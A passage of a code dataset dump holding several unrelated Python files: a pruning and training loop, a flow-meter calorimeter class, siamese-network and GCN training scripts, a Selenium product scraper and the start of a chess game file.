args.autocalc_prune_unit:\n if args.prune_calc_type ==\"relative\":\n assert not args.sense_adaptive_pruning \n prune_unit = math.ceil((1- (args.prune_target_frac)**(1/args.prune_phase_duration))*100)\n logging.info(\"relative prune unit is {}\".format(prune_unit))\n elif args.prune_calc_type ==\"absolute\":\n assert args.sense_adaptive_pruning\n prune_abs_unit = math.ceil( (1-args.prune_target_frac)/args.prune_phase_duration*100 )\n logging.info(\"absolute prune unit is {}\".format(prune_abs_unit))\n else:\n prune_unit = args.prune_unit\n prune_abs_unit= prune_unit\n if args.prune_target_frac is not None:\n prune_target = int(init_mask_count *args.prune_target_frac )\n else:\n prune_target =args.prune_target\n logging.info(\"Target number of masks is : {}\".format(prune_target))\n\n if args.prune_trained:\n if args.prune_trained_hz:\n assert args.hz_lasso_target_prop is None #use prune_trained_pct \n before_score=basic_classification.evaluate(context, context.val_loader,no_grad=args.use_nograd)\n logging.info(\"accuracy before hz_lasso: {} \".format(before_score ) )\n hz_loader = context.train_loader if args.hz_lasso_use_train_loader else context.val_loader\n prop =(100 -args.prune_trained_pct)/100\n hz_lasso_whole_model(context, args,num_samples= args.hz_lasso_num_samples,target_prop= prop, loader=hz_loader,solve_for_weights =args.hz_lasso_solve_for_weights)\n after_score=basic_classification.evaluate(context, context.val_loader,no_grad=args.use_nograd)\n logging.info(\"accuracy after hz_lasso{}\".format(after_score))\n context.model.save(os.path.join( args.model_save_path, args.res_file+\"_prune_\" + str(args.prune_trained_pct) ) )\n if not args.short_test_report:\n context.model.display_subblock_nonzero_masks(nodesc=args.verbose_prune_trained_nodesc)\n return\n elif args.group_prune_strategy == \"taylor\":\n #logging.info(\"pruning trained model using taylor method\")\n taylor_sample_batches(context,args)\n prunefunc = get_pruning_func(context, args)\n prunefunc(args.prune_trained_pct)\n n_unpruned = context.model.proxy_ctx.count_unpruned_masks()\n logging.info(\"Unpruned masks: \"+str(n_unpruned))\n context.model.save(os.path.join( args.model_save_path, args.res_file+\"_prune_taylor_\" + str(args.prune_trained_pct) ) )\n #taylor_sample_clear(context, args)\n if args.verbose_prune_trained:\n context.model.display_subblock_nonzero_masks(nodesc=args.verbose_prune_trained_nodesc)\n\n return\n \n else:\n\n prunefunc = get_pruning_func(context, args)\n if args.iterative_prune_trained: \n assert args.prune_absolute\n init_mask_count = context.model.proxy_ctx.count_unpruned_masks()\n target_mask_count=math.ceil(init_mask_count*(100-args.prune_trained_pct)/100 )\n while True:\n if context.model.proxy_ctx.count_unpruned_masks()<= target_mask_count:\n break \n prunefunc(1)\n else:\n prunefunc(args.prune_trained_pct)\n # context.model.display_subblock_nonzero_masks()\n # import pdb; pdb.set_trace()\n\n model_copy = copy.deepcopy(context.model)\n if args.recalc_weights_after_prune_trained:\n recalc_weights_pruned(context, args, num_samples=3, loader=context.train_loader, model_copy=model_copy)\n n_unpruned = context.model.proxy_ctx.count_unpruned_masks()\n logging.info(\"Unpruned masks: \"+str(n_unpruned))\n context.model.save(os.path.join( args.model_save_path, args.res_file+\"_prune_\" + str(args.prune_trained_pct) ) )\n if args.verbose_prune_trained:\n context.model.display_subblock_nonzero_masks()\n return\n\n\n if args.sensitivity_report:\n one_layer_prune_func = get_one_layer_pruning_func(context,args,prune_abs_unit)\n accs= by_block_accuracies(context, args, prune_abs_unit, one_layer_prune_func)\n logging.info(accs)\n return\n\n if args.do_condense:\n conds_so_far=0\n\n if args.terminate_after_pruning:\n iter_after_pruning=0\n\n if args.reset_weights_before_start:\n logging.info(\"resetting weights\")\n context.model.reset_weights()\n\n\n if args.report_test_error_before_start:\n test_acc = basic_classification.evaluate(context, context.test_loader,no_grad=args.use_nograd)\n logging.info(\"INIITIAL TEST ACCURACY:{}\".format(test_acc))\n print(\"INIITIAL TEST ACCURACY:{}\".format(test_acc))\n\n if args.maintain_abs_deriv_sum:\n enable_grad_storage(context.model)\n\n \n best_eval_score=-float(\"inf\")\n for epoch_count in range(args.num_epochs):\n context.model.train()\n logging.info(\"Starting epoch \"+str(epoch_count) +\".\")\n if args.param_difs:\n param_tensors=genutil_modules.get_named_trainable_param_tensors(context.model)\n step=0\n epoch_start_time=time.time()\n for batch_in, *other in context.train_loader: \n categories = other[0]\n if context.data_type == DataType.SEQUENCE:\n pad_mat = other[1] \n step+=1\n\n context.optimizer.zero_grad()\n \n\n\n\n\n #for image classification, batch_in will have dimension batchsize by imagesize and scores will have dimension batchsize by number of categories\n #For sequence-to-squence batch in will have dimension batchsize by the max sequence length in the batch. scores will have dimension batchsize by max sqeunce_length by categoreis\n\n scores= context.model(batch_in,pad_mat) if context.data_type == DataType.SEQUENCE else context.model(batch_in) #should have dimension batchsize by number of classes\n if args.born_again_enable:\n assert not args.multi_score_model\n context = torch.no_grad() if args.use_no_grad else suppress \n batch_in_v=batch_in.clone()\n batch_in_v.volatile=True\n with context:\n previous_incarnation_scores = previous_incarnation_context.model(batch_in_v,pad_mat) if previous_incarnation_context.data_type == DataType.SEQUENCE else previous_incarnation_context.model(batch_in_v)\n\n\n #move categories to same device as scores\n if not args.multi_score_model and scores.is_cuda:\n categories=categories.cuda(scores.get_device())\n if args.multi_score_model and scores[0].is_cuda:\n categories=categories.cuda(scores[0].get_device())\n\n if args.classification_loss_type == \"cross_entropy\":\n if args.multi_score_model:\n assert args.squeezenet_use_forking\n if args.multi_score_unit_weighting:\n loss=0\n for branch_scores in scores:\n loss+=F.cross_entropy(branch_scores,categories)\n else:\n raise Exception(\"Not implemented!\")\n else:\n loss= F.cross_entropy(scores,categories) \n if args.born_again_enable:\n previous_incarnation_probs = F.softmax(previous_incarnation_scores,dim=1)\n previous_incarnation_divergence = F.kl_div(F.log_softmax(scores,dim=1), previous_incarnation_probs )\n loss+=previous_incarnation_divergence\n elif args.classification_loss_type == \"nll\":\n assert not args.born_again_enable\n assert not args.multi_score_model\n loss= F.nll_loss(scores,categories)\n elif args.classification_loss_type == \"square_hinge\": \n assert not args.born_again_enable\n assert not args.multi_score_model\n mult = Variable(categories.data.new(categories.shape[0], context.num_categories).fill_(0).float()) \n for i in range(categories.shape[0]):\n mult[i,categories[i]]=1\n mult = 2 * mult - 1\n \n loss = torch.mean(torch.max( Variable(categories.data.new(1).fill_(0).float()), 1 - mult * scores ) ** 2)\n\n if args.enable_l0reg:\n lamb_param = None if (args.l0reg_lambda_vary_by_layer or args.l0reg_lambda_vary_by_sublayer_name) else args.l0reg_lambda\n loss += context.model.proxy_ctx.l0_loss(lamb_param) \n\n if args.enable_l1reg and ( (not args.disable_l1_reg_after_epoch) or epoch_count<= args.l1_reg_final_epoch ) :\n l1l = context.model.proxy_ctx.l1_loss_slimming(args.l1reg_lambda)\n accumulated_l1l+=l1l\n loss += l1l\n\n if args.enable_l2reg_stochastic:\n l2l_stochastic =context.model.proxy_ctx.l2_loss_stochastic(args.l2reg_stochastic_lambda) \n accumulated_l2l_stochastic+=float(l2l_stochastic)\n loss+=l2l_stochastic\n loss.backward()\n#comment\n if args.maintain_abs_deriv_sum:\n update_abs_deriv_sum(context.model)\n\n\n\n if args.grad_norm_clip is not None:\n torch.nn.utils.clip_grad.clip_grad_norm(context.model.parameters(), args.grad_norm_clip)\n context.optimizer.step()\n \n if args.clamp_all_params:\n for param in context.model_parameters:\n param.data.clamp_(args.clamp_all_min,args.clamp_all_max)\n\n\n accumulated_loss+=float(loss)\n context.tb_writer.write_train_loss( float(loss) )\n if step % report_interval == 0:\n reporting.report(epoch_start_time,step,len(context.train_loader), accumulated_loss / report_interval)\n accumulated_loss = 0\n if args.enable_l1reg:\n logging.info(\"l1_loss:{}\".format(accumulated_l1l/report_interval))\n accumulated_l1l = 0\n if args.enable_l2reg_stochastic:\n logging.info(\"avg l2 stochastic loss:{}\".format(accumulated_l2l_stochastic/report_interval) )\n accumulated_l2l_stochastic = 0\n #added tor try to clear computation graph after every eppoch\n del loss\n del scores\n context.model.eval()\n epoch_duration = time.time() - epoch_start_time\n context.tb_writer.write_data_per_second( context.train_size/epoch_duration)\n if args.param_difs:\n new_param_tensors=genutil_modules.get_named_trainable_param_tensors(context.model)\n context.tb_writer.write_param_change(new_param_tensors, param_tensors)\n param_tensors=new_param_tensors\n if args.maintain_abs_deriv_sum:\n disable_grad_storage(context.model)\n if epoch_count == 0 or epoch_count % args.eval_interval==0:\n logging.info(\"recalculating eval score\")\n eval_score=basic_classification.evaluate(context, context.val_loader,no_grad=args.use_nograd)\n if args.maintain_abs_deriv_sum:\n enable_grad_storage(context.model)\n\n context.tb_writer.write_accuracy(eval_score)\n logging.info(\"Finished epoch number \"+ str(epoch_count+1) + \" of \" +str(args.num_epochs)+\". Accuracy is \"+ str(eval_score) +\".\")\n if args.report_unpruned:\n n_unpruned = float(context.model.proxy_ctx.count_unpruned_masks())\n logging.info(\"Unpruned masks: \"+str(n_unpruned))\n context.tb_writer.write_unpruned_params(n_unpruned)\n if args.show_network_strucutre_every_epoch:\n logging.info(\"current model:\")\n logging.info(repr(context.model))\n if args.show_nonzero_masks_every_epoch:\n context.model.display_subblock_nonzero_masks(warning=False)\n \n if args.save_every_epoch:\n context.model.save(os.path.join(args.model_save_path,timestamp+args.save_prefix +\"_most_recent\" ) )\n logging.info(\"saving most recent model\")\n \n\n if eval_score > best_eval_score:\n best_eval_score=eval_score\n logging.info(\"Saving model\")\n context.model.save(os.path.join(args.model_save_path,timestamp+\"recent_model\" ) )\n \n if args.lr_scheduler == \"epoch_anneal\":\n logging.info(\"saving as checkpoint\" + str(epoch_anneal_cur_cycle))\n context.model.save(os.path.join(args.model_save_path,timestamp+args.save_prefix +\"_checkpoint_\" +str(epoch_anneal_cur_cycle) ) )\n else:\n context.model.save(os.path.join(args.model_save_path,timestamp+args.save_prefix +\"_best_model\" ) )\n\n\n if context.scheduler is not None:\n if args.lr_scheduler == \"exponential\" or args.lr_scheduler == \"linear\" or args.lr_scheduler == \"multistep\":\n context.tb_writer.write_lr(context.scheduler.get_lr()[0] )\n context.scheduler.step()\n elif args.lr_scheduler == \"plateau\":\n # context.tb_writer.write_lr(next(context.optimizer.param_groups)['lr'] )\n context.scheduler.step(eval_score)\n elif args.lr_scheduler == \"epoch_anneal\":\n context.tb_writer.write_lr(context.scheduler.cur_lr() )\n context.scheduler.step()\n if context.scheduler.cur_step == context.scheduler.Tmax:\n logging.info(\"Hit min learning rate. Restarting learning rate annealing.\")\n context.scheduler.cur_step = -1\n context.scheduler.step()\n best_eval_score= -float(\"inf\")\n if args.epoch_anneal_save_last:\n context.model.save(os.path.join(args.model_save_path,timestamp+args.save_prefix +\"_endofcycle_checkpoint_\" +str(epoch_anneal_cur_cycle) ) )\n if args.epoch_anneal_mult_factor != 1:\n logging.info(\"Multiplying anneal duration by \"+str(args.epoch_anneal_mult_factor))\n context.scheduler.Tmax*=args.epoch_anneal_mult_factor \n logging.info(\"anneal duration currently:\"+str(context.scheduler.Tmax))\n if args.epoch_anneal_update_previous_incarnation:\n if args.epoch_anneal_start_ba_after_epoch and epoch_anneal_cur_cycle == 0:\n args.born_again_enable=True\n previous_incarnation_context=make_context(args)\n\n assert(args.epoch_anneal_save_last)\n logging.info(\"loading previous incarnation\")\n previous_incarnation_context.model.load(os.path.join(args.model_save_path,timestamp+args.save_prefix +\"_endofcycle_checkpoint_\" +str(epoch_anneal_cur_cycle) ) )\n for param in previous_incarnation_context.model.parameters():\n param.requires_grad = False\n if args.epoch_anneal_reinit_after_cycle:\n logging.info(\"resenting parameters of current model\")\n context.model.init_params()\n \n epoch_anneal_cur_cycle+=1\n \n else:\n raise Exception(\"Unknown Scheduler\")\n\n if args.count_multiplies_every_cycle:\n if args.count_mult_override_img_dims:\n img_h = args.count_mult_override_imgh\n img_w = args.count_mult_override_imgw\n channels=3\n else:\n img_h, img_w, channels=get_dims_from_dataset(args.dataset_for_classification)\n mults = countmult.count_approx_multiplies(context.model, img_h=img_h, img_w=img_w, input_channels=channels)\n logging.info(\"Approx number of multiplies: \"+str(mults) ) \n context.tb_writer.write_multiplies(mults)\n\n if args.weight_reset_enable and epoch_count == args.weight_reset_epoch_num :\n context.model.reset_weights()\n \n if args.print_params_after_epoch:\n logging.info(\"model_params:\")\n for param in context.model.proxy_ctx.list_model_params():\n logging.info(str(param)) \n logging.info(\"mask_params\")\n for param in context.model.proxy_ctx.list_mask_params():\n logging.info(str(param))\n if args.enable_pruning: \n assert(args.report_unpruned)\n if args.group_prune_strategy == \"taylor\":\n assert args.maintain_abs_deriv_sum \n if epoch_count >= args.prune_warmup_epochs and epoch_count % args.prune_epoch_freq==0 and n_unpruned> prune_target:\n logging.info(\"pruning...\")\n prunefunc = get_pruning_func(context, args)\n if args.prune_calc_type ==\"relative\":\n pu = prune_unit\n elif args.prune_calc_type ==\"absolute\":\n pu=prune_abs_unit\n\n prunefunc(pu)\n if n_unpruned <=prune_target and args.terminate_after_pruning:\n iter_after_pruning+=1\n if iter_after_pruning > args.iterations_after_pruning:\n break\n\n\n if args.group_prune_strategy == \"taylor\" and args.maintain_abs_deriv_sum :\n clear_abs_deriv_sum(context.model)\n clear_record_of_output(context.model) #neccesary because evaluating the model may have caused additional output to be stored\n\n\n if args.do_condense and epoch_count >= args.condense_warmup and (epoch_count-args.condense_warmup) % args.condense_interval == 0 and conds_so_far= num_samples-1:\n break\n context.model.proxy_ctx.hz_lasso_prune(sb_real, target_num_channels=None,target_prop=target_prop, sample_inputs=sb_real.record_of_input, sample_outputs=sb_copy.record_of_output, solve_for_weights=solve_for_weights)\n sb_real.store_input=False\n sb_copy.store_output=False\n\n sb_real.record_of_input=[]\n sb_copy.record_of_output=[]\n\ndef recalc_weights_pruned(context, args, num_samples, loader,model_copy):\n context.model.eval()\n logging.info(\"re-calculating weights\")\n subblocks = context.model.to_subblocks()\n subblocks_copy = model_copy.to_subblocks()\n from tqdm import tqdm\n sb_loader =tqdm(subblocks.keys())\n for sb_name in sb_loader:\n sb_real = subblocks[sb_name]\n sb_copy = subblocks_copy[sb_name]\n if not isinstance(sb_real, candle.proxy.ProxyConv2d):\n continue\n logging.info(\"pruning {}\".format(sb_name))\n sb_real.store_input= True\n sb_copy.store_output = True\n for i,(batch_in, *other) in enumerate(loader): \n with torch.no_grad():\n context.model(batch_in)\n model_copy(batch_in)\n if i >= num_samples-1:\n break\n context.model.proxy_ctx.recalc_weights_pruned_layer(sb_real,Atensor=torch.cat(sb_real.record_of_input,dim=0), Ytensor=torch.cat(sb_copy.record_of_output,dim=0))\n sb_real.store_input=False\n sb_copy.store_output=False\n\n sb_real.record_of_input=[]\n sb_copy.record_of_output=[]\n context.model.train()\n\n\n\n\n\n\ndef enable_grad_storage(model):\n subblocks = model.to_subblocks()\n for name, layer in subblocks.items():\n if not isinstance(layer, candle.proxy.ProxyConv2d):\n continue\n layer.store_output=True\n layer.store_output_grad=True\n\ndef disable_grad_storage(model):\n subblocks = model.to_subblocks()\n for name, layer in subblocks.items():\n if not isinstance(layer, candle.proxy.ProxyConv2d):\n continue\n layer.store_output=False\n layer.store_output_grad=False\n\n\n\n\ndef update_abs_deriv_sum(model):\n subblocks = model.to_subblocks()\n for _, layer in subblocks.items():\n if not isinstance(layer, candle.proxy.ProxyConv2d):\n continue\n layer.update_abs_deriv_sum()\n\ndef clear_abs_deriv_sum(model):\n subblocks = model.to_subblocks()\n for _, layer in subblocks.items():\n if not isinstance(layer, candle.proxy.ProxyConv2d):\n continue\n layer.record_of_abs_deriv_sum=0\n\ndef clear_record_of_output(model):\n subblocks = model.to_subblocks()\n for _, layer in subblocks.items():\n if not isinstance(layer, candle.proxy.ProxyConv2d):\n continue\n layer.record_of_output=[]\n\n\n\n\ndef taylor_sample_batches(context, args):\n #note: this function may change a model slightly by changing its batch norm running averages\n assert args.group_prune_strategy == \"taylor\" \n context.model.eval()\n loader=context.val_loader #using a subset of the train set will cause randomness because the train set is shuffled\n subblocks = context.model.to_subblocks()\n for name, layer in subblocks.items():\n if not isinstance(layer, candle.proxy.ProxyConv2d):\n continue\n layer.store_output=True\n layer.store_output_grad=True\n for i, (batch_in,*other) in enumerate(loader):\n categories = other[0]\n scores = context.model(batch_in)\n loss= F.cross_entropy(scores,categories) \n loss.backward()\n for _, layer in subblocks.items():\n if not isinstance(layer, candle.proxy.ProxyConv2d):\n continue\n layer.update_abs_deriv_sum()\n\n context.optimizer.zero_grad()\n #if i >= args.taylor_num_samples -1:\n # break\n context.model.train()\n \n \n\ndef taylor_sample_clear(context,args):\n subblocks = context.model.to_subblocks()\n for name, layer in subblocks.items():\n if not isinstance(layer, candle.proxy.ProxyConv2d):\n continue\n layer.store_output=False\n layer.record_of_output=[]\n layer.record_of_output_grad=[]\n\n","sub_path":"examples/lab/basic_classify.py","file_name":"basic_classify.py","file_ext":"py","file_size_in_byte":61245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"392501359","text":"__author__ = 'Brian Albiston'\nimport sys, datetime, time\nimport numpy as np\nimport math\nimport traceback\n\n\"\"\"\n Class to use a scale as a flow meter\n\"\"\"\nclass scaleFlowMeter(object):\n \"\"\"\n Initialize \n \"\"\"\n def __init__(self,samples):\n #\n self.start_time = time.time()\n self.delta_grams = 0\n self.current_grams = 0\n self.current_sample_time = time.time()\n self.delta_time = time.time() - self.start_time\n self.delta_seconds = datetime.timedelta(seconds=self.delta_time)\n self.seconds = self.delta_seconds.total_seconds()\n self.flowLPM = 0\n self.filling = 0\n self.mass_vector = []\n self.time_vector = []\n\n # Settings from GUI\n self.samples = samples\n\n \"\"\"\n Start Scale Flow Calculation \n \"\"\"\n def start(self, grams, time):\n try:\n # Initialize Variables\n # self.start_time = time.time()\n self.start_time = time\n self.current_grams = grams\n self.mass_vector.append(self.current_grams)\n self.time_vector.append(self.start_time)\n\n except Exception as err:\n print(\"Scale flow update Error, {}\".format(datetime.datetime.now().strftime(\"%d %H:%M:%S\")))\n traceback.print_tb(err.__traceback__)\n pass\n\n \"\"\"\n Update Scale Flow Running Average\n \"\"\"\n def update(self, grams, time):\n try:\n self.current_grams = grams\n self.current_sample_time = time\n\n # Append last read counter count\n self.mass_vector.append(self.current_grams)\n # self.time_vector.append(time.time())\n self.time_vector.append(self.current_sample_time)\n\n # Running Average\n # If vectors are still filling don't delete last value\n if len(self.mass_vector) < self.samples:\n self.delta_grams = self.mass_vector[-1] - \\\n self.mass_vector[0] # Negative index is last element\n self.delta_time = self.time_vector[-1] - self.time_vector[0]\n\n # If vectors are too long\n elif len(self.mass_vector) > self.samples:\n # Slice off extra values\n self.mass_vector = self.mass_vector[len(self.mass_vector) - self.samples:]\n self.time_vector = self.time_vector[len(self.time_vector) - self.samples:]\n self.delta_grams = self.mass_vector[-1] - \\\n self.mass_vector.pop(0) # pop returns and removes last item\n self.delta_time = self.time_vector[-1] - self.time_vector.pop(0)\n\n # Vectors just right, read and remove last value\n else:\n self.delta_grams = self.mass_vector[-1] - self.mass_vector.pop(0)\n self.delta_time = self.time_vector[-1] - self.time_vector.pop(0)\n\n # Find Average Flow Rate\n self.delta_seconds = datetime.timedelta(seconds=self.delta_time)\n self.seconds = self.delta_seconds.total_seconds()\n if self.seconds > 0:\n # Flow in liters/min = Delta grams * (1 liter / 1000 grams) / Delta seconds * (60 seconds/ 1 min)\n # self.flowLPM = (self.delta_grams / 1000) * (60 / self.delta_time);\n self.flowLPM = (self.delta_grams / 1000) * (60 / self.seconds);\n else:\n self.flowLPM = 0\n\n except Exception as err:\n print(\"Flow Calorimeter scaleFlowMeter Update Error, {}\".format(\n datetime.datetime.now().strftime(\"%d %H:%M:%S\")))\n traceback.print_tb(err.__traceback__)\n pass\n\n\"\"\"\nWater Flow Calorimeter\n\"\"\"\nclass flowCalorimeter(object):\n def __init__(self,samples,specific_heat=4.184):\n # Initialize Calorimeter Parameters\n self.cp = specific_heat\n self.running = 0\n # self.start_time = time.time()\n self.start_wh = 0\n self.delta_wh = 0\n self.current_wh = 0\n self.last_time = time.time()\n self.delta_time = time.time()\n self.current_time = time.time()\n self.delta_seconds = datetime.timedelta(seconds=self.delta_time)\n self.seconds = self.delta_seconds.total_seconds()\n self.flowLPM = 0\n self.filling = 0\n self.temperature_in = 0\n self.temperature_out = 0\n self.watts_in = 0\n self.cop = 1\n self.cop_avg = 1\n self.flowGramsPerSec = 0\n self.watts_out = 0\n self.in_joules_total = 0\n self.out_joules_total = 0\n self.excess_MJ = 0\n self.cop_vector = []\n self.time_vector = []\n\n # Settings from GUI\n self.samples = samples\n\n \"\"\"\n Start Calorimeter \n \"\"\"\n def start(self,wh_in):\n try:\n # set running flag\n self.running = 1\n self.last_time = time.time()\n self.start_wh = wh_in\n\n self.start_time = time.time()\n self.cop_vector.append(self.cop)\n self.time_vector.append(self.start_time)\n\n except Exception as err:\n self.running = 0\n print(\"Calorimeter Start Error, {}\".format(\n datetime.datetime.now().strftime(\"%d %H:%M:%S\")))\n traceback.print_tb(err.__traceback__)\n e = sys.exc_info()[0]\n print(\"Calorimeter Start Error: %s\" % e)\n pass\n\n \"\"\"\n Update Calorimeter \n \"\"\"\n def update(self,temperature_in,temperature_out,flowLPM,watts_in,wh_in,filling=0):\n try:\n self.flowLPM = flowLPM\n self.filling = filling\n self.temperature_in = temperature_in\n self.temperature_out = temperature_out\n self.watts_in = watts_in\n self.current_wh = wh_in\n\n \"\"\"\n COP Calculation\n \"\"\"\n # Find flow in grams/sec = flow liters/min * 1000g/1liter * 1 min/60sec\n self.flowGramsPerSec = self.flowLPM * 1000 / 60\n\n # Power out = 4.184 * flow_rate * (T_out - T_in) flow_rate in grams/sec\n self.watts_out = self.cp * self.flowGramsPerSec * (self.temperature_out - self.temperature_in)\n\n # Find COP\n if (self.watts_in > 0) and (self.filling == 1):\n self.cop = self.watts_out/self.watts_in\n else:\n self.cop = 1\n\n \"\"\"\n Excess Energy Calculation\n \"\"\"\n # Find deltas since start of cycle\n self.delta_wh = self.current_wh - self.start_wh\n\n # Find deltas since last update\n self.current_time = time.time()\n self.delta_time = self.current_time - self.last_time\n self.delta_seconds = datetime.timedelta(seconds=self.delta_time)\n self.seconds = self.delta_seconds.total_seconds()\n\n # Set time for next iteration\n self.last_time = self.current_time\n\n # Find total joules in\n # 1 Watt-hr = 3600 J\n self.in_joules_total = self.delta_wh * 3600\n\n # Find total joules out\n self.out_joules_total = self.out_joules_total + self.watts_out * self.seconds\n\n # Find Excess MJ\n self.excess_MJ = (self.out_joules_total - self.in_joules_total)/1000000\n\n # Find COP Running Average\n # Append last cop\n self.cop_vector.append(self.cop)\n\n # Running Average\n # If vectors are still filling don't delete last value\n if len(self.cop_vector) < self.samples:\n self.cop_avg = np.average(self.cop_vector) # Negative index is last element\n\n # Vector is long enough\n else:\n # Slice off extra values\n self.cop_vector = self.cop_vector[len(self.cop_vector) - self.samples:]\n\n # Calculate Average\n self.cop_avg = np.average(self.cop_vector)\n\n except Exception as err:\n print(\"Calorimeter Update Error, {}\".format(\n datetime.datetime.now().strftime(\"%d %H:%M:%S\")))\n traceback.print_tb(err.__traceback__)\n e = sys.exc_info()[0]\n print(\"Calorimeter Update Error: %s\" % e)\n pass\n\n \"\"\"\n Reset Calorimeter\n \"\"\"\n def reset(self):\n try:\n self.start_wh = self.current_wh\n self.out_joules_total = 0\n\n except Exception as err:\n print(\"Calorimeter Reset Error, {}\".format(\n datetime.datetime.now().strftime(\"%d %H:%M:%S\")))\n traceback.print_tb(err.__traceback__)\n e = sys.exc_info()[0]\n print(\"Calorimeter Reset Error: %s\" % e)\n pass","sub_path":"mfmp_flow_calorimeter.py","file_name":"mfmp_flow_calorimeter.py","file_ext":"py","file_size_in_byte":8764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"172449178","text":"from siameseimage import *\n\nbase_path = Path('../src')\n\nimg_train = base_path / 'train_images'\n\ndf = pd.read_csv(base_path / 'train.csv')\n\n## Prepare Data ##\n## Remove duplicates\ndf.drop_duplicates(['image_phash'], inplace = True)\n\n## Make shure that for each label, there are at least 2 unique images.\ndf_groupby_label = df.groupby(['label_group'])['image_phash'].nunique().to_frame()\nkeep_labels = df_groupby_label[df_groupby_label.image_phash >= 2].index.tolist()\ndf = df[df['label_group'].isin(keep_labels)].reset_index(drop = True)\ndf.drop(['title'], axis = 1, inplace = True)\n\n## Decrease size of dataframe for testing purposes.\npct = 0.1\n\nlabels = df['label_group'].unique()\n## Sample given percentage from the labels\nkeep_labels = np.random.choice(labels, size = int(len(labels)*pct), replace = False)\n## Restrict dataframe to instances that are in chosen labels\ndf = df[df['label_group'].isin(keep_labels)]\ndf = df.reset_index(drop = True)\n\ndf = split_df(df, label_col = 'label_group', verbose = False)\n\n#print('Head of the dataframe:')\n#print(df.head())\n\ntfm = SiameseTransform(df, path = img_train, f_col = 'image', label_col = 'label_group', val_col = 'is_valid')\n\ntls = TfmdLists(range(df.shape[0]), tfm, splits = tfm.splits)\n\nsize = 224\nbs = 32\ndls = tls.dataloaders(after_item=[Resize(size), ToTensor], \n after_batch=[IntToFloatTensor, Normalize.from_stats(*imagenet_stats)],\n bs = bs\n )\n\narc = resnet34\ncut = model_meta[arc]['cut']\nencoder = create_body(arc, cut = cut)\nhead = create_head(512 * 2, 2, ps=0.5)\nmodel = SiameseModel(encoder, head)\n\nlearn = Learner(dls, model, loss_func = CrossEntropyLossFlat(), splitter = siamese_splitter, metrics = accuracy).to_fp16()\nlearn.freeze()\nlearn.fine_tune(3)\n","sub_path":"siameseimage/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"121365782","text":"\"\"\"\nThis script is a proof of concept to train GCN as fast as possible and with as\nlittle lines of code as possible.\nIt uses a custom training function instead of the standard Keras fit(), and\ncan train GCN for 200 epochs in a few tenths of a second (~0.20 on a GTX 1050).\n\"\"\"\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Input, Dropout\nfrom tensorflow.keras.losses import CategoricalCrossentropy\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.regularizers import l2\n\nfrom spektral.datasets.citation import Cora\nfrom spektral.layers import GCNConv\nfrom spektral.transforms import LayerPreprocess, AdjToSpTensor\nfrom spektral.utils import tic, toc\n\n# Load data\ndataset = Cora(transforms=[LayerPreprocess(GCNConv), AdjToSpTensor()])\ngraph = dataset[0]\nx, a, y = graph.x, graph.a, graph.y\nmask_tr, mask_va, mask_te = dataset.mask_tr, dataset.mask_va, dataset.mask_te\n\n# Define model\nx_in = Input(shape=(dataset.n_node_features,))\na_in = Input((dataset.n_nodes,), sparse=True)\nx_1 = GCNConv(16, 'relu', True, kernel_regularizer=l2(5e-4))([x_in, a_in])\nx_1 = Dropout(0.5)(x_1)\nx_2 = GCNConv(y.shape[1], 'softmax', True)([x_1, a_in])\n\n# Build model\nmodel = Model(inputs=[x_in, a_in], outputs=x_2)\noptimizer = Adam(lr=1e-2)\nloss_fn = CategoricalCrossentropy()\n\n\n# Training step\n@tf.function\ndef train():\n with tf.GradientTape() as tape:\n predictions = model([x, a], training=True)\n loss = loss_fn(y[mask_tr], predictions[mask_tr])\n loss += sum(model.losses)\n gradients = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n return loss\n\n\n# Time the execution of 200 epochs of training\ntrain() # Warm up to ignore tracing times when timing\ntic()\nfor epoch in range(1, 201):\n train()\ntoc('Spektral - GCN (200 epochs)')\n","sub_path":"examples/node_prediction/citation_gcn_custom.py","file_name":"citation_gcn_custom.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"137526133","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver import ActionChains\nimport time\nimport re\nimport numpy as np\nimport string\nimport unidecode\n\n\n\nPATH = \"E:\\Selenium\\Introduction_To_Data_Science\\chromedriver.exe\"\n\ndriver = webdriver.Chrome(PATH)\nurls = [\n 'https://www.dienmayxanh.com/dien-thoai?g=dien-thoai-pho-thong&page=0#g:62879',\n 'https://www.dienmayxanh.com/dien-thoai?g=iphone-ios&page=0#g:39238',\n 'https://www.dienmayxanh.com/dien-thoai?g=android#g:39237'\n]\ndef clean_string(string): \n string = string.replace('\\n',' ')\n string = string.replace(',',' ')\n string = string.rstrip()\n string_without_newline = \"\"\n for c in string:\n if c.isalpha() or c.isdigit() or c == ' ':\n string_without_newline += c\n return string_without_newline\n\ndef get_infor():\n name = driver.find_element_by_css_selector('h1').text()\n price = driver.find_element_by_css_selector('.displayp').text()\n number_of_comment = driver.find_element_by_class_name('.tltRt').text()\n re.findall('[0-9]+',number_of_comment)\n description = driver.execute_script('''\n let arr = [];\n document.querySelector('.viewparameterfull').click();\n \n ''')\n\nfor url in urls:\n driver.get(url)\n driver.execute_script('''\n \n x = document.querySelector('.loadmore');\n while ( x != null){\n x.click();\n x = document.querySelector('.loadmore');\n }\n \n ''')\n products = driver.find_elements_by_class_name('prdItemGetDelStt')\n for product in products:\n driver.get(product.get_attribute(\"href\"))\n infos = get_infor()\n print(len(products))\n time.sleep(1.5)\n \n\n","sub_path":"dienmayxanh/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"174858261","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom Pieces import *\nfrom Logger import Logger\nimport json\n\nclass Game:\n\n #\n # DONE\n # Initialisation de la partie\n # 